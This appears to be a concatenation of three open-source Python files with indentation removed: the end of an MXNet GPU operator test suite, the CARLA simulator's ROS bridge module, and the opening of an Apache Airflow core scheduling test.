test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] is 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] is 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@unittest.skip('skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@unittest.skip('skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z.simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
if __name__ == '__main__':
import nose
nose.runmodule()
|
bridge.py
|
#!/usr/bin/env python
#
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Rosbridge class:
Class that handle communication between CARLA and ROS
"""
try:
import queue
except ImportError:
import Queue as queue
import sys
from distutils.version import LooseVersion
from threading import Thread, Lock, Event
import pkg_resources
import rospy
import carla
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.communication import Communication
from carla_ros_bridge.sensor import Sensor
from carla_ros_bridge.carla_status_publisher import CarlaStatusPublisher
from carla_ros_bridge.world_info import WorldInfo
from carla_ros_bridge.spectator import Spectator
from carla_ros_bridge.traffic import Traffic, TrafficLight
from carla_ros_bridge.vehicle import Vehicle
from carla_ros_bridge.lidar import Lidar
from carla_ros_bridge.radar import Radar
from carla_ros_bridge.gnss import Gnss
from carla_ros_bridge.imu import ImuSensor
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.collision_sensor import CollisionSensor
from carla_ros_bridge.lane_invasion_sensor import LaneInvasionSensor
from carla_ros_bridge.camera import Camera, RgbCamera, DepthCamera, SemanticSegmentationCamera
from carla_ros_bridge.object_sensor import ObjectSensor
from carla_ros_bridge.rss_sensor import RssSensor
from carla_ros_bridge.walker import Walker
from carla_ros_bridge.debug_helper import DebugHelper
from carla_ros_bridge.traffic_lights_sensor import TrafficLightsSensor
from carla_msgs.msg import CarlaActorList, CarlaActorInfo, CarlaControl, CarlaWeatherParameters
class CarlaRosBridge(object):
"""
Carla Ros bridge
"""
CARLA_VERSION = "0.9.9"
def __init__(self, carla_world, params):
"""
Constructor
:param carla_world: carla world object
:type carla_world: carla.World
:param params: dict of parameters, see settings.yaml
:type params: dict
"""
self.parameters = params
self.actors = {}
self.pseudo_actors = []
self.carla_world = carla_world
self.synchronous_mode_update_thread = None
self.shutdown = Event()
# set carla world settings
self.carla_settings = carla_world.get_settings()
# workaround: settings can only applied within non-sync mode
if self.carla_settings.synchronous_mode:
self.carla_settings.synchronous_mode = False
carla_world.apply_settings(self.carla_settings)
rospy.loginfo("synchronous_mode: {}".format(
self.parameters["synchronous_mode"]))
self.carla_settings.synchronous_mode = self.parameters["synchronous_mode"]
rospy.loginfo("fixed_delta_seconds: {}".format(
self.parameters["fixed_delta_seconds"]))
self.carla_settings.fixed_delta_seconds = self.parameters["fixed_delta_seconds"]
carla_world.apply_settings(self.carla_settings)
self.comm = Communication()
self.update_lock = Lock()
self.carla_control_queue = queue.Queue()
self.status_publisher = CarlaStatusPublisher(
self.carla_settings.synchronous_mode,
self.carla_settings.fixed_delta_seconds)
# for waiting for ego vehicle control commands in synchronous mode,
# their ids are maintained in a list.
# Before tick(), the list is filled and the loop waits until the list is empty.
self._all_vehicle_control_commands_received = Event()
self._expected_ego_vehicle_control_command_ids = []
self._expected_ego_vehicle_control_command_ids_lock = Lock()
if self.carla_settings.synchronous_mode:
self.carla_run_state = CarlaControl.PLAY
self.carla_control_subscriber = \
rospy.Subscriber("/carla/control", CarlaControl,
lambda control: self.carla_control_queue.put(control.command))
self.synchronous_mode_update_thread = Thread(
target=self._synchronous_mode_update)
self.synchronous_mode_update_thread.start()
else:
self.timestamp_last_run = 0.0
self.update_actors_queue = queue.Queue(maxsize=1)
# start thread to update actors
self.update_actor_thread = Thread(
target=self._update_actors_thread)
self.update_actor_thread.start()
# create initially existing actors
self.update_actors_queue.put(
set([x.id for x in self.carla_world.get_snapshot()]))
# wait for first actors creation to be finished
self.update_actors_queue.join()
# register callback to update actors
self.on_tick_id = self.carla_world.on_tick(self._carla_time_tick)
self.carla_weather_subscriber = \
rospy.Subscriber("/carla/weather_control",
CarlaWeatherParameters, self.on_weather_changed)
# add world info
self.pseudo_actors.append(WorldInfo(carla_world=self.carla_world,
communication=self.comm))
# add global object sensor
self.pseudo_actors.append(ObjectSensor(parent=None,
communication=self.comm,
actor_list=self.actors,
filtered_id=None))
self.debug_helper = DebugHelper(carla_world.debug)
# add traffic light pseudo sensor
self.pseudo_actors.append(TrafficLightsSensor(parent=None,
communication=self.comm,
actor_list=self.actors))
def destroy(self):
"""
Function to destroy this object.
:return:
"""
rospy.signal_shutdown("")
self.debug_helper.destroy()
self.shutdown.set()
self.carla_weather_subscriber.unregister()
self.carla_control_queue.put(CarlaControl.STEP_ONCE)
if not self.carla_settings.synchronous_mode:
if self.on_tick_id:
self.carla_world.remove_on_tick(self.on_tick_id)
self.update_actor_thread.join()
self._update_actors(set())
rospy.loginfo("Exiting Bridge")
def on_weather_changed(self, weather_parameters):
"""
Callback on new weather parameters
:return:
"""
if not self.carla_world:
return
rospy.loginfo("Applying weather parameters...")
weather = carla.WeatherParameters()
weather.cloudiness = weather_parameters.cloudiness
weather.precipitation = weather_parameters.precipitation
weather.precipitation_deposits = weather_parameters.precipitation_deposits
weather.wind_intensity = weather_parameters.wind_intensity
weather.fog_density = weather_parameters.fog_density
weather.fog_distance = weather_parameters.fog_distance
weather.wetness = weather_parameters.wetness
weather.sun_azimuth_angle = weather_parameters.sun_azimuth_angle
weather.sun_altitude_angle = weather_parameters.sun_altitude_angle
self.carla_world.set_weather(weather)
def process_run_state(self):
"""
process state changes
"""
command = None
# get last command
while not self.carla_control_queue.empty():
command = self.carla_control_queue.get()
while command is not None and not rospy.is_shutdown():
self.carla_run_state = command
if self.carla_run_state == CarlaControl.PAUSE:
# wait for next command
rospy.loginfo("State set to PAUSED")
self.status_publisher.set_synchronous_mode_running(False)
command = self.carla_control_queue.get()
elif self.carla_run_state == CarlaControl.PLAY:
rospy.loginfo("State set to PLAY")
self.status_publisher.set_synchronous_mode_running(True)
return
elif self.carla_run_state == CarlaControl.STEP_ONCE:
rospy.loginfo("Execute single step.")
self.status_publisher.set_synchronous_mode_running(True)
self.carla_control_queue.put(CarlaControl.PAUSE)
return
def _synchronous_mode_update(self):
"""
execution loop for synchronous mode
"""
while not self.shutdown.is_set():
self.process_run_state()
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# fill list of available ego vehicles
self._expected_ego_vehicle_control_command_ids = []
with self._expected_ego_vehicle_control_command_ids_lock:
for actor_id, actor in self.actors.items():
if isinstance(actor, EgoVehicle):
self._expected_ego_vehicle_control_command_ids.append(
actor_id)
frame = self.carla_world.tick()
world_snapshot = self.carla_world.get_snapshot()
self.status_publisher.set_frame(frame)
self.comm.update_clock(world_snapshot.timestamp)
rospy.logdebug("Tick for frame {} returned. Waiting for sensor data...".format(
frame))
self._update(frame, world_snapshot.timestamp.elapsed_seconds)
rospy.logdebug("Waiting for sensor data finished.")
self.comm.send_msgs()
self._update_actors(set([x.id for x in world_snapshot]))
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# wait for all ego vehicles to send a vehicle control command
if self._expected_ego_vehicle_control_command_ids:
if not self._all_vehicle_control_commands_received.wait(1):
rospy.logwarn("Timeout (1s) while waiting for vehicle control commands. "
"Missing command from actor ids {}".format(
self._expected_ego_vehicle_control_command_ids))
self._all_vehicle_control_commands_received.clear()
def _carla_time_tick(self, carla_snapshot):
"""
Private callback registered at carla.World.on_tick()
to trigger cyclic updates.
After successful locking the update mutex
(only perform trylock to respect bridge processing time)
the clock and the children are updated.
Finally the ROS messages collected to be published are sent out.
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if not self.shutdown.is_set():
if self.update_lock.acquire(False):
if self.timestamp_last_run < carla_snapshot.timestamp.elapsed_seconds:
self.timestamp_last_run = carla_snapshot.timestamp.elapsed_seconds
self.comm.update_clock(carla_snapshot.timestamp)
self.status_publisher.set_frame(carla_snapshot.frame)
self._update(carla_snapshot.frame,
carla_snapshot.timestamp.elapsed_seconds)
self.comm.send_msgs()
self.update_lock.release()
# if possible push current snapshot to update-actors-thread
try:
self.update_actors_queue.put_nowait(
set([x.id for x in carla_snapshot]))
except queue.Full:
pass
def _update_actors_thread(self):
"""
execution loop for async mode actor list updates
"""
while not self.shutdown.is_set():
try:
current_actors = self.update_actors_queue.get(timeout=1)
if current_actors:
self._update_actors(current_actors)
self.update_actors_queue.task_done()
except queue.Empty:
pass
def _update_actors(self, current_actors):
"""
update the available actors
"""
previous_actors = set(self.actors)
new_actors = current_actors - previous_actors
deleted_actors = previous_actors - current_actors
if new_actors:
for carla_actor in self.carla_world.get_actors(list(new_actors)):
self._create_actor(carla_actor)
if deleted_actors:
for id_to_delete in deleted_actors:
# remove actor
actor = self.actors[id_to_delete]
with self.update_lock:
rospy.loginfo("Remove {}(id={}, parent_id={}, prefix={})".format(
actor.__class__.__name__, actor.get_id(),
actor.get_parent_id(),
actor.get_prefix()))
actor.destroy()
del self.actors[id_to_delete]
# remove pseudo-actors that have actor as parent
updated_pseudo_actors = []
for pseudo_actor in self.pseudo_actors:
if pseudo_actor.get_parent_id() == id_to_delete:
rospy.loginfo("Remove {}(parent_id={}, prefix={})".format(
pseudo_actor.__class__.__name__,
pseudo_actor.get_parent_id(),
pseudo_actor.get_prefix()))
pseudo_actor.destroy()
del pseudo_actor
else:
updated_pseudo_actors.append(pseudo_actor)
self.pseudo_actors = updated_pseudo_actors
# publish actor list on change
if new_actors or deleted_actors:
self.publish_actor_list()
def publish_actor_list(self):
"""
publish list of carla actors
:return:
"""
ros_actor_list = CarlaActorList()
for actor_id in self.actors:
actor = self.actors[actor_id].carla_actor
ros_actor = CarlaActorInfo()
ros_actor.id = actor.id
ros_actor.type = actor.type_id
try:
ros_actor.rolename = str(actor.attributes.get('role_name'))
except ValueError:
pass
if actor.parent:
ros_actor.parent_id = actor.parent.id
else:
ros_actor.parent_id = 0
ros_actor_list.actors.append(ros_actor)
self.comm.publish_message(
"/carla/actor_list", ros_actor_list, is_latched=True)
def _create_actor(self, carla_actor): # pylint: disable=too-many-branches,too-many-statements
"""
create an actor
"""
parent = None
if carla_actor.parent:
if carla_actor.parent.id in self.actors:
parent = self.actors[carla_actor.parent.id]
else:
parent = self._create_actor(carla_actor.parent)
actor = None
pseudo_actors = []
if carla_actor.type_id.startswith('traffic'):
if carla_actor.type_id == "traffic.traffic_light":
actor = TrafficLight(carla_actor, parent, self.comm)
else:
actor = Traffic(carla_actor, parent, self.comm)
elif carla_actor.type_id.startswith("vehicle"):
if carla_actor.attributes.get('role_name')\
in self.parameters['ego_vehicle']['role_name']:
actor = EgoVehicle(
carla_actor, parent, self.comm, self._ego_vehicle_control_applied_callback)
pseudo_actors.append(ObjectSensor(parent=actor,
communication=self.comm,
actor_list=self.actors,
filtered_id=carla_actor.id))
else:
actor = Vehicle(carla_actor, parent, self.comm)
elif carla_actor.type_id.startswith("sensor"):
if carla_actor.type_id.startswith("sensor.camera"):
if carla_actor.type_id.startswith("sensor.camera.rgb"):
actor = RgbCamera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.camera.depth"):
actor = DepthCamera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.camera.semantic_segmentation"):
actor = SemanticSegmentationCamera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
else:
actor = Camera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.lidar"):
actor = Lidar(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.radar"):
actor = Radar(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.gnss"):
actor = Gnss(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.imu"):
actor = ImuSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.collision"):
actor = CollisionSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.rss"):
actor = RssSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.lane_invasion"):
actor = LaneInvasionSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
else:
actor = Sensor(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("spectator"):
actor = Spectator(carla_actor, parent, self.comm)
elif carla_actor.type_id.startswith("walker"):
actor = Walker(carla_actor, parent, self.comm)
else:
actor = Actor(carla_actor, parent, self.comm)
rospy.loginfo("Created {}(id={}, parent_id={},"
" type={}, prefix={}, attributes={})".format(
actor.__class__.__name__, actor.get_id(),
actor.get_parent_id(), carla_actor.type_id,
actor.get_prefix(), carla_actor.attributes))
with self.update_lock:
self.actors[carla_actor.id] = actor
for pseudo_actor in pseudo_actors:
rospy.loginfo("Created {}(parent_id={}, prefix={})".format(
pseudo_actor.__class__.__name__,
pseudo_actor.get_parent_id(),
pseudo_actor.get_prefix()))
with self.update_lock:
self.pseudo_actors.append(pseudo_actor)
return actor
def run(self):
"""
Run the bridge functionality.
Registers on shutdown callback at rospy and spins ROS.
:return:
"""
rospy.on_shutdown(self.on_shutdown)
rospy.spin()
def on_shutdown(self):
"""
Function to be called on shutdown.
This function is registered at rospy as shutdown handler.
"""
rospy.loginfo("Shutdown requested")
self.destroy()
def _update(self, frame_id, timestamp):
"""
update all actors
:return:
"""
# update all pseudo actors
for actor in self.pseudo_actors:
actor.update(frame_id, timestamp)
# update all carla actors
for actor_id in self.actors:
try:
self.actors[actor_id].update(frame_id, timestamp)
except RuntimeError as e:
rospy.logwarn("Update actor {}({}) failed: {}".format(
self.actors[actor_id].__class__.__name__, actor_id, e))
continue
def _ego_vehicle_control_applied_callback(self, ego_vehicle_id):
if not self.carla_settings.synchronous_mode or \
not self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
return
with self._expected_ego_vehicle_control_command_ids_lock:
if ego_vehicle_id in self._expected_ego_vehicle_control_command_ids:
self._expected_ego_vehicle_control_command_ids.remove(
ego_vehicle_id)
else:
rospy.logwarn(
"Unexpected vehicle control command received from {}".format(ego_vehicle_id))
if not self._expected_ego_vehicle_control_command_ids:
self._all_vehicle_control_commands_received.set()
def main():
"""
main function for carla simulator ROS bridge
maintaining the communication client and the CarlaBridge object
"""
rospy.init_node("carla_bridge", anonymous=True)
parameters = rospy.get_param('carla')
rospy.loginfo("Trying to connect to {host}:{port}".format(
host=parameters['host'], port=parameters['port']))
carla_bridge = None
carla_world = None
carla_client = None
try:
carla_client = carla.Client(
host=parameters['host'],
port=parameters['port'])
carla_client.set_timeout(parameters['timeout'])
# check carla version
dist = pkg_resources.get_distribution("carla")
if LooseVersion(dist.version) < LooseVersion(CarlaRosBridge.CARLA_VERSION):
rospy.logfatal("CARLA python module version {} required. Found: {}".format(
CarlaRosBridge.CARLA_VERSION, dist.version))
sys.exit(1)
if LooseVersion(carla_client.get_server_version()) < \
LooseVersion(CarlaRosBridge.CARLA_VERSION):
rospy.logfatal("CARLA Server version {} required. Found: {}".format(
CarlaRosBridge.CARLA_VERSION, carla_client.get_server_version()))
sys.exit(1)
carla_world = carla_client.get_world()
if "town" in parameters:
if parameters["town"].endswith(".xodr"):
rospy.loginfo(
"Loading opendrive world from file '{}'".format(parameters["town"]))
with open(parameters["town"]) as od_file:
data = od_file.read()
carla_world = carla_client.generate_opendrive_world(str(data))
else:
if carla_world.get_map().name != parameters["town"]:
rospy.loginfo("Loading town '{}' (previous: '{}').".format(
parameters["town"], carla_world.get_map().name))
carla_world = carla_client.load_world(parameters["town"])
carla_world.tick()
carla_bridge = CarlaRosBridge(carla_client.get_world(), parameters)
carla_bridge.run()
except (IOError, RuntimeError) as e:
rospy.logerr("Error: {}".format(e))
finally:
del carla_world
del carla_client
if __name__ == "__main__":
main()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 21
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
configuration.conf.load_test_config()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
